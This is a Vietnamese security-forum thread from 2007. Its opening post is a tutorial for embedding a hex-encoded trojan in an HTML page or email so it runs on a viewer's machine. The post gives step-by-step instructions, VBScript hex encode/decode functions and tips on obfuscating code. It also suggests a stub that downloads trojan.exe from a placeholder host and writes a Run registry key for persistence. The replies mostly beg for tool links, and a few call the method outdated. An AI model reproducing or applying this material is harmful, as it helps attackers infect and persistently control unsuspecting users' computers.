banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Kĩ thuật gắn Trojan vào file HTML  XML
  [Question]   Kĩ thuật gắn Trojan vào file HTML 13/01/2007 10:39:03 (+0700) | #1 | 35951
Ke_Pha_Hoai
Member

[Minus]    0    [Plus]
Joined: 26/12/2006 01:24:16
Messages: 1
Location: 9999999999999999
Offline
[Profile] [PM] [Email] [Yahoo!] [MSN] [ICQ]
Kĩ thuật gắn Trojan vào file HTML

Bạn muốn chạy tự động 1 trojan trên máy tính người khác khi họ xem trang Web hoặc Email của bạn...! Có cách nào không??? Dĩ nhiên là được rồi! Bài viết này sẽ giúp bạn giải quyết vấn đề!

1) Hướng dẫn:

· Bước 1: chuẩn bị một file trojan.exe, kích thước khoảng 5 - 40Kb. Nếu bạn không có trojan, bạn có thể tải về từ trang TlSecurity.com hoặc tự viết một file
trojan.exe để xài!

· Bước 2: chạy convert16.exe để convert file trojan.exe sang trojan.hex

· Bước 3: dùng 1 trình soạn thảo văn bản dạng text( nên dùng EditPlus, nó rất
hay!) để sửa file temp.htm như sau:

Thay phần .doc=”4D5A900... 64620000” thành .doc=”<đặt nội dung của file trojan.hex vào đây>” VD: .doc=”9631447da55abcd44ac25...”

· Bước 4: Nhúng file nội dung file temp.htm sau khi sửa vào trang Web hoặc Email và gởi đến cho người khác!



2) Mã nguồn:



· Files:

§ tempsrc.hta dùng để extract và execute trojan.exe

§ tempsrc.htm file htm chính

§ convert16.vbp & convert16.frm : file nguồn của chương trình Convert 16, được viết bằng Visual Basic 6, dùng để convert file .exe sang file .hex



· Những vấn đề chính:



§ Kĩ thuật ‘Convert 16’: dùng để tạo 1 file nhị phân, ví dụ như trojan.exe

Chuyển mã ANSI của kí tự sang hệ cơ số 16 hexa. Từ mã ANSI của kí tự ở hệ 16 chúng ta dễ dàng chuyển về lại kí tự ban đầu. Để dễ hiểu, tôi đưa ra ví dụ sau:



Kí tự
L
P
T
V

C
l
u
b

2
0
0
1

Mã ANSI ở hệ 10
76
80
84
86
32
67
108
117
98
32
50
48
48
49

Mã ANSI ở hệ 16
4C
50
54
56
20
43
6C
75
62
20
32
30
30
31




Encode16 Decode16

“LPTV Club 2001” “4C50545620436C75622032303031” “LPTV Club 2001”



‘--- VBScript Code ---



function encode16(st)

for i = 1 to len(st)

temp = hex((asc(mid(st,i,1)))

‘ mid(st,i,1) lấy 1 kí tự trong chuổi st ở vị trí thứ i

‘ asc(mid(st,i,1)) trả về mã ANSI của kí tự này

‘ temp = hex((asc(mid(st,i,1))) sẽ chứa mã ANSI ở hệ 16 của kí tự

if len(temp) = 1 then ‘vì mã ANSI của kí tự chỉ nằm trong khoảng từ 0 đến 255 (0h-FFh), nên nếu độ dài của temp=1 chúng ta sẽ thêm 0 vào trước! Ví dụ: 0A, 07, ...

temp =”0” & temp

end if

encode16 = encode16 & temp

next

end function



function decode16(st)

for i =1 to len(st) step 2 ‘như ở trên, mỗi kí tự được mã bằng đúng 2 kí tự nên bước nhảy step = 2

decode16 = decode16 & chr(“&h” & mid(st,i,2))

‘ mid(st,i,2) trả về 1 chuổi gồm 2 kí tự, bắt đầu từ vị trí thứ i trong chuổi

‘chr(“&h” & mid(st,i,2)) trả về kí tự có mã ANSI ở hệ 16; “&h” dùng để chỉ hệ 16

next

end function

‘--- VBScript Code ---



§ Kĩ thuật ‘Encode’: được sử dụng trong file temp.hta & temp.htm



ü Mục đích:

+ giảm kích thước file

+ làm cho mã lệnh khó đọc đối với người khác



ü Ví dụ: thay vì viết lệnh rõ ràng:



on error resume next

dn=chr(34)

xd=vbcrlf

set wsh=createobject("wscript.shell")

set fso=createobject("scripting.filesystemobject")



Chúng ta cũng có thể viết lại như sau:



on error resume nextj=chr(34)q=vbcrlfset g=createobject("wscript.shell")set t6=createobject("scripting.filesystemobject")



Bạn thấy mã lệnh nhỏ hơn trước và có khó đọc không?



3) Hỏi/Đáp:



· Có thể gắn virus hoặc 1 chương trình khác thay cho trojan không?



Dĩ nhiên là được rồi! Bạn thử nghĩ lại xem, file virus, trojan.exe hầu như đều là các file .exe chương trình có khả năng tự thực thi nên bạn hoàn toàn có thể thay đổi theo ý muốn của bạn!



· Nếu tôi gắn 1 file trojan.exe lớn trong file temp.html , file này sẽ lớn kinh khủng, người khác có thể nghi ngờ! Vậy làm sao bây giờ?



· Tôi muốn máy họ tự động download file trojan.exe từ trên mạng về và execute nó? Có được không?



Rất dễ! Thay vì phải gắn file trojan.exe, chúng ta sẽ gắn 1 file chương trình nhỏ khoảng 5 KB. Nhiệm vụ của file này là download trojan.exe từ http://www.somewhere.com/yoursite/trojan.exe và thi hành nó! Bạn nên sửa lại mã của file .hta một chút!: bỏ lệnh xóa file temp.exe và thêm lệnh tạo registry-startup cho file temp.exe!

...

wsh.regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kernel 32”,filetrojan

...



Bạn có thể sử dụng chương trình Web Dowloader để giải quyết vấn đề trên! Tôi có gởi kèm chương trình Web Dowloader trong tập hướng dẫn này, file Webdownloader2.0.zip



· Có thể chạy trojan.exe ngay sau khi người khác đọc trang Web hoặc Email mà không cần họ khởi động lại máy tính không?



Hoàn toàn có thể được! Nhưng trong phạm vi bài viết này, tôi không muốn đề cập đến!



Chúc các bạn thành công!
[Locked] [Up] [Print Copy]
  [Question]   Re: Kĩ thuật gắn Trojan vào file HTML 14/01/2007 14:49:19 (+0700) | #2 | 36166
[Avatar]
Trj3µ–Kj3µ–LØng™
Member

[Minus]    0    [Plus]
Joined: 14/01/2007 01:40:40
Messages: 1
Location: Địa Ngục
Offline
[Profile] [PM] [WWW] [Yahoo!]
Pro nói về phần mềm dung` đẻ chuyển file Trojan.exe sang Trojan.hex
sao không cho link down
mình không có cái nầy ,và mình cũng đang kần nó smilie
pro post link down đi
[Locked] [Up] [Print Copy]
  [Question]   Re: Kĩ thuật gắn Trojan vào file HTML 14/01/2007 23:23:01 (+0700) | #3 | 36220
GrudgeBoy
Member

[Minus]    0    [Plus]
Joined: 12/01/2007 14:16:39
Messages: 18
Offline
[Profile] [PM]
Anh hai cho em link download cái phần mềm chuyển file *.exe sang file *.hex đi
Nhân tiện anh hai giải thích cho em hiểu sau khi đưa file trojan vào máy người dùng thì phải chạy bằng VB phải không ? vậy anh giải thích rõ hơn về cái code đó đi
smilie
[Locked] [Up] [Print Copy]
  [Question]   Re: Kĩ thuật gắn Trojan vào file HTML 17/01/2007 02:34:10 (+0700) | #4 | 36680
longhp6789
Member

[Minus]    0    [Plus]
Joined: 15/01/2007 16:46:39
Messages: 1
Offline
[Profile] [PM]
Bạn cung cấp cho forum đường link đi
[Locked] [Up] [Print Copy]
  [Question]   Kĩ thuật gắn Trojan vào file HTML 19/01/2007 10:42:50 (+0700) | #5 | 37114
virgo.vipro
Member

[Minus]    0    [Plus]
Joined: 09/12/2006 12:03:07
Messages: 4
Offline
[Profile] [PM]
cậu nói mà không cho luôn cái link làm mọi người lên reply hoài kìa nếu có thì đưa lên không có thì lên xin lỗi đi chắc lại copy bài ở đâu đây mà.
[Locked] [Up] [Print Copy]
  [Question]   Re: Kĩ thuật gắn Trojan vào file HTML 21/01/2007 04:25:44 (+0700) | #6 | 37338
abaanh
Member

[Minus]    0    [Plus]
Joined: 03/12/2006 20:24:29
Messages: 23
Offline
[Profile] [PM]
NHưng không biết nó có chạy với pack 2 không nhỉ?Em gắn mấy lần rồi nó không chạy.













------------------------------
http://hapdan.tk
[Locked] [Up] [Print Copy]
  [Question]   Re: Kĩ thuật gắn Trojan vào file HTML 09/11/2007 04:25:22 (+0700) | #7 | 96287
[Avatar]
corequad4nhan
Member

[Minus]    0    [Plus]
Joined: 06/11/2007 16:19:11
Messages: 20
Location: Việt Nam
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!]
Hình như linkdown bi die rồi.Cho link khác đi. smilie
[Locked] [Up] [Print Copy]
  [Question]   Re: Kĩ thuật gắn Trojan vào file HTML 09/11/2007 06:03:27 (+0700) | #8 | 96308
[Avatar]
Look2Me
Member

[Minus]    0    [Plus]
Joined: 26/07/2006 23:30:57
Messages: 235
Location: Tủ quần nào
Offline
[Profile] [PM]
Kỹ thuật này được áp dụng vào những năm 2000. Bây giờ là 2007 rồi vẫy mà vẫn còn người nhắc tới. Tài thật!
[Locked] [Up] [Print Copy]
  [Question]   Re: Kĩ thuật gắn Trojan vào file HTML 09/11/2007 08:56:41 (+0700) | #9 | 96352
[Avatar]
hongtham
Member

[Minus]    0    [Plus]
Joined: 31/01/2007 15:29:12
Messages: 104
Offline
[Profile] [PM]
Bài này search trên mạng thì có rất nhiều bản tương tự, hình như HVA cũ cũng có từ những năm trước với IE 5 trở xuống, lúc mà godwill1.6 còn tác dụng. Mới tìm thấy hơi mừng nhưng tìm convert16.exe mãi không thấy chương trình nào như đã nói smilie
Không biết tác giả đã thử gắn Trojan vào file HTML theo cách này chưa mà post lên như thế smilie
Có lẽ kĩ thuật gắn Trojan vào file HTML hiện nay chỉ nằm ở nước ngoài và chưa được tiết lộ đến chúng ta thì phải.
[Locked] [Up] [Print Copy]
  [Question]   Re: Kĩ thuật gắn Trojan vào file HTML 09/11/2007 22:03:25 (+0700) | #10 | 96473
[Avatar]
haipt
Member

[Minus]    0    [Plus]
Joined: 20/08/2004 19:48:44
Messages: 165
Location: Hải phòng
Offline
[Profile] [PM] [WWW]
smilie Toàn hác cơ mà ko viết được đoạn code chuyển từ exe sang hex thì ko lên nghiên cứu tiếp làm gì cho phí thời gian,
tập trung vô việc học đi
[Locked] [Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|